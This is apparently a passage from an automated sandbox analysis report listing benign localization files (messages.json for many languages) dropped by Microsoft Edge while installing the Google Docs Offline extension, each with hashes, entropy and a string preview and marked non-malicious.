Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
